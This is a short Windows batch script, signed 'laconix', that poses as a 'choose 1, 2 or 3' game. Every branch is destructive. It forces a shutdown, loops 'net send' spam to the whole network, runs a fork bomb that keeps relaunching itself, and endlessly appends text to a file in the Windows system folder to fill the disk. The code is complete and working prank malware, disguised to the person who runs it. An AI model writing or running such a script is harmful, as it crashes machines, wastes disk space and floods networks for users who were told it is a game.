@echo off title Choices.. [by laconix] cls echo You have some choices to make.. echo ..make the wrong choice though and suffer the consequencs! echo. pause :menu cls echo. echo. echo. echo. echo. echo /------------------------------\ echo / Pick a number between 1 and 3 \ echo (- 1 .. 2 .. 3 -) echo \ Every choice but one is bad! / echo \------------------------------/ set choice = nada echo ?.:What'll it be:.? set /p choice= Huh? cls if %choice% == 1 GOTO one if %choice% == 2 GOTO two if %choice% == 3 GOTO three msg * Neither 1, 2 or 3 eh? Too bad, bye bye.. shutdown -s -f -t 00 :one msg * So you chose #1, thought you'd be safe? msg * WRONG! :netspam net send * laconix rules! GOTO netspam :two shutdown -s -t 10 pause msg * Hope you get this in time, because this was the safe one... shutdown -a GOTO hell :three msg * This is the safe number... pause :fork start choices.bat | msg * Memory wipeout! GOTO fork :hell msg * joke, they're all bad! :textbomb echo laconix rules! >> %systemroot%/laconix.txt GOTO :textbomb